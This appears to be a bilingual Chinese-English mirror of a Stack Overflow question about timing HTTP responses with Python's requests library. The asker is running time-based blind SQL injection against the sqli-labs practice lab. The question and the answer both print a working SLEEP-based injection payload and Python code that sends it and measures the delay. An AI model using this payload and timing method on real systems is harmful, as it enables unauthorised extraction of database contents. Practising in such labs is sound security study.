使用Python中的请求库测量HTTP响应时间.我做对了吗? [英] Measuring the HTTP response time with requests library in Python. Am I doing it right?
问题描述
我试图在Web应用程序的HTTP响应中引入人为延迟(这是一种用于盲目SQL注入的技术).如果以下HTTP请求是从浏览器发送的,则Web服务器的响应会在3秒后返回(由sleep(3)引起):
I am trying to induce an artificial delay in the HTTP response from a web application (This is a technique used to do blind SQL Injections). If the below HTTP request is sent from a browser, response from the web server comes back after 3 seconds(caused by sleep(3)):
http://192.168.2.15/sqli-labs/Less-9/?id=1'+and+if+(ascii(substr(database(),+1,+1))=115,sleep(3),null)+--+
我正在尝试使用请求库在Python 2.7中执行相同的操作.我的代码是:
I am trying to do the same in Python 2.7 using the requests library. The code I have is:
import requests
payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = r.elapsed.total_seconds()
print roundtrip
我希望往返时间为3秒,但我得到的值是0.001371、0.001616、0.002228等.我是否没有正确使用elapsed属性?
I expected the roundtrip to be 3 seconds, but instead I get values 0.001371, 0.001616, 0.002228, etc. Am I not using the elapsed attribute properly?
推荐答案
elapsed measures the time between sending the request and finishing parsing the response headers, not until the full response has been transfered.
如果要测量时间,则需要自己测量:
If you want to measure that time, you need to measure it yourself:
import requests
import time
payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
start = time.time()
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = time.time() - start
print roundtrip
这篇关于使用Python中的请求库测量HTTP响应时间.我做对了吗?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!